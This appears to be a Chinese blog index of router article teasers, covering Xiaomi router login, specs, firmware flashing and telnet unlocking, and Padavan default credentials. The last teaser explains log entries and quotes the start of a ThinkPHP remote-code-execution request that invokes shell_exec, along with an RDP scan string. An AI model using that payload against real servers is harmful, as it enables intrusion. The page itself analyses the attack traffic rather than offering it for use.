通知 欢迎关注我的店铺天天软件圆

手机访问miwifi.com进不去小米路由器后台?小米路由器登录入口192.168.31.1

手机访问miwifi.com进不去小米路由器后台?小米路由器登录入口192.168.31.1密码时,手机浏览器反复跳转小米官网,气得我差点把路由器从窗户扔出去!经过3小时折腾,终于摸清了门道,这就把我的血泪经验分享给你。为什么手机打开miwifi.com会跳转官网?这个坑我替你们踩过了!原来当手机没有连接到路由器WiFi时,小米服务器会自动把miwifi.com的访问请求重定向到官网。就像你去邻居家非要开自家门锁,系统当然会把你赶出来。▌先做这三步基础检查:

阅读全文:手机访问miwifi.com进不去小米路由器后台?小米路由器登录入口192.168.31.1


‌小米BE6500 Pro路由器配置详细参数介绍

‌小米BE6500 Pro路由器配置详细参数介绍经历了一场史诗级的「网络瘫痪事件」——媳妇追剧卡成PPT,闺女上网课疯狂掉线,连智能马桶都提示网络连接失败。我蹲在路由器旁边咬牙切齿的时候终于明白:这年头,路由器才是家庭和谐的核心科技啊!痛定思痛换了小米路由器BE6500Pro之后,现在全家人抢着夸我是「技术宅救星」。今天就和大家唠唠这个让我咸鱼翻身的黑科技,顺便分享点真实使用心得。一、穿墙王之前我家路由器放在客厅,主卧厕所就成了信号黑洞。换了BE650

阅读全文:‌小米BE6500 Pro路由器配置详细参数介绍


Redmi 12 5G手机发布时间官宣,红米Redmi 12 5G跑分

Redmi 12 5G手机发布时间官宣,红米Redmi 12 5G跑分米宣布在印度全球首发Redmi125G手机。该款手机搭载了6.79英寸FHD+显示屏,刷新率为90Hz,采用了50MP+8MP+2MP三摄系统和联发科HelioG88芯片。此外,Redmi125G还支持4/8GB+128/256GB存储组合、5000mAh电池和18W快速充电。目前售价和其他详细配置尚未公布,敬请期待正式发布。正文:小米宣布将于8月1日在印度全球首

阅读全文:Redmi 12 5G手机发布时间官宣,红米Redmi 12 5G跑分


AC2100(RM2100)红米/小米AC2100官方固件最简单一键解锁开启telnet并刷openwrt/老毛子固件方法

AC2100(RM2100)红米/小米AC2100官方固件最简单一键解锁开启telnet并刷openwrt/老毛子固件方法者特殊符号作为计算机名会导致文件服务器开启失败,修改为英文重启后就可以了。PPPOE服务器运行异常、提示"Interfaceisinvalid(nopcapmatchfound)!"等错误可以试试安装目录下的npcap-0.9991.exe(自动卸载Winpcap)[AC2100(RM2100)]红米/小米AC2100一键解锁开启telnet(Windows平台)建议看完以下注意点和工具里的准备工作在刷。1、工具最好在单

阅读全文:AC2100(RM2100)红米/小米AC2100官方固件最简单一键解锁开启telnet并刷openwrt/老毛子固件方法


OpenWRT(LEDE)编译固件修改固件原始CPU频率超频,小米路由R3G超频1100Mhz固件下载

OpenWRT(LEDE)编译固件修改固件原始CPU频率超频,小米路由R3G超频1100Mhz固件下载小米路由R3G的超频设置,只能从硬件初始化入手,折腾一翻后成功把小米路由R3G超频到1100Mhz。小米路由R3G超频到1100Mhz设置教程Openwrt固件的超频1100Mhz设置这里使用的是Lean的Openwrt内核4.14,推荐4.14内核,v2瑞性能是最好的,新内核5.4会造成性能大幅下降。Lean的内核4.14的源码包下

阅读全文:OpenWRT(LEDE)编译固件修改固件原始CPU频率超频,小米路由R3G超频1100Mhz固件下载


啪嗒路由器app内网穿透远程控制华硕老毛子斐讯K1/K2/K3padavan固件设置

啪嗒路由器app内网穿透远程控制华硕老毛子斐讯K1/K2/K3padavan固件设置现在公司都倒闭咯,但是不管说啥,路由器还是不错的,都可以刷第三方固件,也是尝试过很多固件最终固定在老毛子华硕固件上了,非常好用,功能齐全.最重要是作者适配了几乎所有能刷固件的路由器,更新非常及时。默认登陆信息默认网关:192.168.123.1默认的用户名:admin密码:adminWiFi名称:pdcn 密码:1234567890斐讯K1/K2/K3最新华硕

阅读全文:啪嗒路由器app内网穿透远程控制华硕老毛子斐讯K1/K2/K3padavan固件设置


\/x03\/x00\/x00*\/xE0\/x00\/x00\/x00\/x00\/x00Cookie mstshash=Administr针对thinkphp的远程代码执行漏洞进行的攻击

\/x03\/x00\/x00*\/xE0\/x00\/x00\/x00\/x00\/x00Cookie mstshash=Administr针对thinkphp的远程代码执行漏洞进行的攻击过的代码\/x03\/x00\/x00*\/xE0\/x00\/x00\/x00\/x00\/x00Cookiemstshash=Administr经过在网上查资料发现这是主要针对的是thinkphp的远程代码执行漏洞进行的攻击,1、请求1:/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exe

阅读全文:\/x03\/x00\/x00*\/xE0\/x00\/x00\/x00\/x00\/x00Cookie mstshash=Administr针对thinkphp的远程代码执行漏洞进行的攻击